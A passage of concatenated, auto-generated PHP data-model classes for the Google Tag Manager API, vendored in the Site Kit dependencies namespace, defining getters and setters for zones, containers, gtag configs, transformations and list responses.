Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class RevertZoneResponse extends \Google\Site_Kit_Dependencies\Google\Model { protected $zoneType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Zone::class; protected $zoneDataType = ''; /** * @param Zone */ public function setZone(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Zone $zone) { $this->zone = $zone; } /** * @return Zone */ public function getZone() { return $this->zone; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertZoneResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_RevertZoneResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class RevertTagResponse extends \Google\Site_Kit_Dependencies\Google\Model { protected $tagType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Tag::class; protected $tagDataType = ''; /** * @param Tag */ public function setTag(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Tag $tag) { $this->tag = $tag; } /** * @return Tag */ public function getTag() { return $this->tag; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertTagResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_RevertTagResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class Zone extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'childContainer'; /** * @var string */ public $accountId; protected $boundaryType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\ZoneBoundary::class; protected $boundaryDataType = ''; protected $childContainerType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\ZoneChildContainer::class; protected $childContainerDataType = 'array'; /** * @var string */ public $containerId; /** * @var string */ public $fingerprint; /** * @var string */ public $name; /** * @var string */ public $notes; /** * @var string */ public $path; /** * @var string */ public $tagManagerUrl; protected $typeRestrictionType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\ZoneTypeRestriction::class; protected $typeRestrictionDataType = ''; /** * @var string */ public $workspaceId; /** * @var string */ public $zoneId; /** * @param string */ public function setAccountId($accountId) { $this->accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param ZoneBoundary */ public function setBoundary(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ZoneBoundary $boundary) { $this->boundary = $boundary; } /** * @return ZoneBoundary */ public function getBoundary() { return $this->boundary; } /** * @param ZoneChildContainer[] */ public function setChildContainer($childContainer) { $this->childContainer = $childContainer; } /** * @return ZoneChildContainer[] */ public function getChildContainer() { return $this->childContainer; } /** * @param string */ public function setContainerId($containerId) { $this->containerId = $containerId; } /** * @return string */ public function getContainerId() { return $this->containerId; } /** * @param string */ public function setFingerprint($fingerprint) { $this->fingerprint = $fingerprint; } /** * @return string */ public function getFingerprint() { return $this->fingerprint; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setNotes($notes) { $this->notes = $notes; } /** * @return string */ public function getNotes() { return $this->notes; } /** * @param string */ public function setPath($path) { $this->path = $path; } /** * @return string */ public function getPath() { return $this->path; } /** * @param string */ public function setTagManagerUrl($tagManagerUrl) { $this->tagManagerUrl = $tagManagerUrl; } /** * @return string */ public function getTagManagerUrl() { return $this->tagManagerUrl; } /** * @param ZoneTypeRestriction */ public function setTypeRestriction(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ZoneTypeRestriction $typeRestriction) { $this->typeRestriction = $typeRestriction; } /** * @return ZoneTypeRestriction */ public function getTypeRestriction() { return $this->typeRestriction; } /** * @param string */ public function setWorkspaceId($workspaceId) { $this->workspaceId = $workspaceId; } /** * @return string */ public function getWorkspaceId() { return $this->workspaceId; } /** * @param string */ public function setZoneId($zoneId) { $this->zoneId = $zoneId; } /** * @return string */ public function getZoneId() { return $this->zoneId; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Zone::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Zone'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class ListContainerVersionsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'containerVersionHeader'; protected $containerVersionHeaderType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\ContainerVersionHeader::class; protected $containerVersionHeaderDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param ContainerVersionHeader[] */ public function setContainerVersionHeader($containerVersionHeader) { $this->containerVersionHeader = $containerVersionHeader; } /** * @return ContainerVersionHeader[] */ public function getContainerVersionHeader() { return $this->containerVersionHeader; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ListContainerVersionsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_ListContainerVersionsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class Transformation extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'parameter'; /** * @var string */ public $accountId; /** * @var string */ public $containerId; /** * @var string */ public $fingerprint; /** * @var string */ public $name; /** * @var string */ public $notes; protected $parameterType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $parameterDataType = 'array'; /** * @var string */ public $parentFolderId; /** * @var string */ public $path; /** * @var string */ public $tagManagerUrl; /** * @var string */ public $transformationId; /** * @var string */ public $type; /** * @var string */ public $workspaceId; /** * @param string */ public function setAccountId($accountId) { $this->accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param string */ public function setContainerId($containerId) { $this->containerId = $containerId; } /** * @return string */ public function getContainerId() { return $this->containerId; } /** * @param string */ public function setFingerprint($fingerprint) { $this->fingerprint = $fingerprint; } /** * @return string */ public function getFingerprint() { return $this->fingerprint; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setNotes($notes) { $this->notes = $notes; } /** * @return string */ public function getNotes() { return $this->notes; } /** * @param Parameter[] */ public function setParameter($parameter) { $this->parameter = $parameter; } /** * @return Parameter[] */ public function getParameter() { return $this->parameter; } /** * @param string */ public function setParentFolderId($parentFolderId) { $this->parentFolderId = $parentFolderId; } /** * @return string */ public function getParentFolderId() { return $this->parentFolderId; } /** * @param string */ public function setPath($path) { $this->path = $path; } /** * @return string */ public function getPath() { return $this->path; } /** * @param string */ public function setTagManagerUrl($tagManagerUrl) { $this->tagManagerUrl = $tagManagerUrl; } /** * @return string */ public function getTagManagerUrl() { return $this->tagManagerUrl; } /** * @param string */ public function setTransformationId($transformationId) { $this->transformationId = $transformationId; } /** * @return string */ public function getTransformationId() { return $this->transformationId; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setWorkspaceId($workspaceId) { $this->workspaceId = $workspaceId; } /** * @return string */ public function getWorkspaceId() { return $this->workspaceId; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Transformation::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Transformation'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class RevertBuiltInVariableResponse extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $enabled; /** * @param bool */ public function setEnabled($enabled) { $this->enabled = $enabled; } /** * @return bool */ public function getEnabled() { return $this->enabled; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertBuiltInVariableResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_RevertBuiltInVariableResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class ListFoldersResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'folder'; protected $folderType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Folder::class; protected $folderDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param Folder[] */ public function setFolder($folder) { $this->folder = $folder; } /** * @return Folder[] */ public function getFolder() { return $this->folder; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ListFoldersResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_ListFoldersResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class Container extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'usageContext'; /** * @var string */ public $accountId; /** * @var string */ public $containerId; /** * @var string[] */ public $domainName; protected $featuresType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\ContainerFeatures::class; protected $featuresDataType = ''; /** * @var string */ public $fingerprint; /** * @var string */ public $name; /** * @var string */ public $notes; /** * @var string */ public $path; /** * @var string */ public $publicId; /** * @var string[] */ public $tagIds; /** * @var string */ public $tagManagerUrl; /** * @var string[] */ public $taggingServerUrls; /** * @var string[] */ public $usageContext; /** * @param string */ public function setAccountId($accountId) { $this->accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param string */ public function setContainerId($containerId) { $this->containerId = $containerId; } /** * @return string */ public function getContainerId() { return $this->containerId; } /** * @param string[] */ public function setDomainName($domainName) { $this->domainName = $domainName; } /** * @return string[] */ public function getDomainName() { return $this->domainName; } /** * @param ContainerFeatures */ public function setFeatures(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ContainerFeatures $features) { $this->features = $features; } /** * @return ContainerFeatures */ public function getFeatures() { return $this->features; } /** * @param string */ public function setFingerprint($fingerprint) { $this->fingerprint = $fingerprint; } /** * @return string */ public function getFingerprint() { return $this->fingerprint; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setNotes($notes) { $this->notes = $notes; } /** * @return string */ public function getNotes() { return $this->notes; } /** * @param string */ public function setPath($path) { $this->path = $path; } /** * @return string */ public function getPath() { return $this->path; } /** * @param string */ public function setPublicId($publicId) { $this->publicId = $publicId; } /** * @return string */ public function getPublicId() { return $this->publicId; } /** * @param string[] */ public function setTagIds($tagIds) { $this->tagIds = $tagIds; } /** * @return string[] */ public function getTagIds() { return $this->tagIds; } /** * @param string */ public function setTagManagerUrl($tagManagerUrl) { $this->tagManagerUrl = $tagManagerUrl; } /** * @return string */ public function getTagManagerUrl() { return $this->tagManagerUrl; } /** * @param string[] */ public function setTaggingServerUrls($taggingServerUrls) { $this->taggingServerUrls = $taggingServerUrls; } /** * @return string[] */ public function getTaggingServerUrls() { return $this->taggingServerUrls; } /** * @param string[] */ public function setUsageContext($usageContext) { $this->usageContext = $usageContext; } /** * @return string[] */ public function getUsageContext() { return $this->usageContext; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Container::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Container'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class ListWorkspacesResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'workspace'; /** * @var string */ public $nextPageToken; protected $workspaceType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Workspace::class; protected $workspaceDataType = 'array'; /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param Workspace[] */ public function setWorkspace($workspace) { $this->workspace = $workspace; } /** * @return Workspace[] */ public function getWorkspace() { return $this->workspace; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ListWorkspacesResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_ListWorkspacesResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class ListGtagConfigResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'gtagConfig'; protected $gtagConfigType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\GtagConfig::class; protected $gtagConfigDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GtagConfig[] */ public function setGtagConfig($gtagConfig) { $this->gtagConfig = $gtagConfig; } /** * @return GtagConfig[] */ public function getGtagConfig() { return $this->gtagConfig; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ListGtagConfigResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_ListGtagConfigResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class ListUserPermissionsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'userPermission'; /** * @var string */ public $nextPageToken; protected $userPermissionType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\UserPermission::class; protected $userPermissionDataType = 'array'; /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param UserPermission[] */ public function setUserPermission($userPermission) { $this->userPermission = $userPermission; } /** * @return UserPermission[] */ public function getUserPermission() { return $this->userPermission; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ListUserPermissionsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_ListUserPermissionsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class GtagConfig extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'parameter'; /** * @var string */ public $accountId; /** * @var string */ public $containerId; /** * @var string */ public $fingerprint; /** * @var string */ public $gtagConfigId; protected $parameterType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $parameterDataType = 'array'; /** * @var string */ public $path; /** * @var string */ public $tagManagerUrl; /** * @var string */ public $type; /** * @var string */ public $workspaceId; /** * @param string */ public function setAccountId($accountId) { $this->accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param string */ public function setContainerId($containerId) { $this->containerId = $containerId; } /** * @return string */ public function getContainerId() { return $this->containerId; } /** * @param string */ public function setFingerprint($fingerprint) { $this->fingerprint = $fingerprint; } /** * @return string */ public function getFingerprint() { return $this->fingerprint; } /** * @param string */ public function setGtagConfigId($gtagConfigId) { $this->gtagConfigId = $gtagConfigId; } /** * @return string */ public function getGtagConfigId() { return $this->gtagConfigId; } /** * @param Parameter[] */ public function setParameter($parameter) { $this->parameter = $parameter; } /** * @return Parameter[] */ public function getParameter() { return $this->parameter; } /** * @param string */ public function setPath($path) { $this->path = $path; } /** * @return string */ public function getPath() { return $this->path; } /** * @param string */ public function setTagManagerUrl($tagManagerUrl) { $this->tagManagerUrl = $tagManagerUrl; } /** * @return string */ public function getTagManagerUrl() { return $this->tagManagerUrl; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setWorkspaceId($workspaceId) { $this->workspaceId = $workspaceId; } /** * @return string */ public function getWorkspaceId() { return $this->workspaceId; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\GtagConfig::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_GtagConfig'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class ContainerFeatures extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $supportBuiltInVariables; /** * @var bool */ public $supportClients; /** * @var bool */ public $supportEnvironments; /** * @var bool */ public $supportFolders; /** * @var bool */ public $supportGtagConfigs; /** * @var bool */ public $supportTags; /** * @var bool */ public $supportTemplates; /** * @var bool */ public $supportTransformations; /** * @var bool */ public $supportTriggers; /** * @var bool */ public $supportUserPermissions; /** * @var bool */ public $supportVariables; /** * @var bool */ public $supportVersions; /** * @var bool */ public $supportWorkspaces; /** * @var bool */ public $supportZones; /** * @param bool */ public function setSupportBuiltInVariables($supportBuiltInVariables) { $this->supportBuiltInVariables = $supportBuiltInVariables; } /** * @return bool */ public function getSupportBuiltInVariables() { return $this->supportBuiltInVariables; } /** * @param bool */ public function setSupportClients($supportClients) { $this->supportClients = $supportClients; } /** * @return bool */ public function getSupportClients() { return $this->supportClients; } /** * @param bool */ public function setSupportEnvironments($supportEnvironments) { $this->supportEnvironments = $supportEnvironments; } /** * @return bool */ public function getSupportEnvironments() { return $this->supportEnvironments; } /** * @param bool */ public function setSupportFolders($supportFolders) { $this->supportFolders = $supportFolders; } /** * @return bool */ public function getSupportFolders() { return $this->supportFolders; } /** * @param bool */ public function setSupportGtagConfigs($supportGtagConfigs) { $this->supportGtagConfigs = $supportGtagConfigs; } /** * @return bool */ public function getSupportGtagConfigs() { return $this->supportGtagConfigs; } /** * @param bool */ public function setSupportTags($supportTags) { $this->supportTags = $supportTags; } /** * @return bool */ public function getSupportTags() { return $this->supportTags; } /** * @param bool */ public function setSupportTemplates($supportTemplates) { $this->supportTemplates = $supportTemplates; } /** * @return bool */ public function getSupportTemplates() { return $this->supportTemplates; } /** * @param bool */ public function setSupportTransformations($supportTransformations) { $this->supportTransformations = $supportTransformations; } /** * @return bool */ public function getSupportTransformations() { return $this->supportTransformations; } /** * @param bool */ public function setSupportTriggers($supportTriggers) { $this->supportTriggers = $supportTriggers; } /** * @return bool */ public function getSupportTriggers() { return $this->supportTriggers; } /** * @param bool */ public function setSupportUserPermissions($supportUserPermissions) { $this->supportUserPermissions = $supportUserPermissions; } /** * @return bool */ public function getSupportUserPermissions() { return $this->supportUserPermissions; } /** * @param bool */ public function setSupportVariables($supportVariables) { $this->supportVariables = $supportVariables; } /** * @return bool */ public function getSupportVariables() { return $this->supportVariables; } /** * @param bool */ public function setSupportVersions($supportVersions) { $this->supportVersions = $supportVersions; } /** * @return bool */ public function getSupportVersions() { return $this->supportVersions; } /** * @param bool */ public function setSupportWorkspaces($supportWorkspaces) { $this->supportWorkspaces = $supportWorkspaces; } /** * @return bool */ public function getSupportWorkspaces() { return $this->supportWorkspaces; } /** * @param bool */ public function setSupportZones($supportZones) { $this->supportZones = $supportZones; } /** * @return bool */ public function getSupportZones() { return $this->supportZones; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ContainerFeatures::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_ContainerFeatures'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class VariableFormatValue extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $caseConversionType; protected $convertFalseToValueType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $convertFalseToValueDataType = ''; protected $convertNullToValueType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $convertNullToValueDataType = ''; protected $convertTrueToValueType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $convertTrueToValueDataType = ''; protected $convertUndefinedToValueType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $convertUndefinedToValueDataType = ''; /** * @param string */ public function setCaseConversionType($caseConversionType) { $this->caseConversionType = $caseConversionType; } /** * @return string */ public function getCaseConversionType() { return $this->caseConversionType; } /** * @param Parameter */ public function setConvertFalseToValue(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter $convertFalseToValue) { $this->convertFalseToValue = $convertFalseToValue; } /** * @return Parameter */ public function getConvertFalseToValue() { return $this->convertFalseToValue; } /** * @param Parameter */ public function setConvertNullToValue(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter $convertNullToValue) { $this->convertNullToValue = $convertNullToValue; } /** * @return Parameter */ public function getConvertNullToValue() { return $this->convertNullToValue; } /** * @param Parameter */ public function setConvertTrueToValue(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter $convertTrueToValue) { $this->convertTrueToValue = $convertTrueToValue; } /** * @return Parameter */ public function getConvertTrueToValue() { return $this->convertTrueToValue; } /** * @param Parameter */ public function setConvertUndefinedToValue(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter $convertUndefinedToValue) { $this->convertUndefinedToValue = $convertUndefinedToValue; } /** * @return Parameter */ public function getConvertUndefinedToValue() { return $this->convertUndefinedToValue; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\VariableFormatValue::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_VariableFormatValue'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class ListClientsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'client'; protected $clientType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Client::class; protected $clientDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param Client[] */ public function setClient($client) { $this->client = $client; } /** * @return Client[] */ public function getClient() { return $this->client; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ListClientsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_ListClientsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class FolderEntities extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'variable'; /** * @var string */ public $nextPageToken; protected $tagType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Tag::class; protected $tagDataType = 'array'; protected $triggerType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Trigger::class; protected $triggerDataType = 'array'; protected $variableType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Variable::class; protected $variableDataType = 'array'; /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param Tag[] */ public function setTag($tag) { $this->tag = $tag; } /** * @return Tag[] */ public function getTag() { return $this->tag; } /** * @param Trigger[] */ public function setTrigger($trigger) { $this->trigger = $trigger; } /** * @return Trigger[] */ public function getTrigger() { return $this->trigger; } /** * @param Variable[] */ public function setVariable($variable) { $this->variable = $variable; } /** * @return Variable[] */ public function getVariable() { return $this->variable; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\FolderEntities::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_FolderEntities'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * 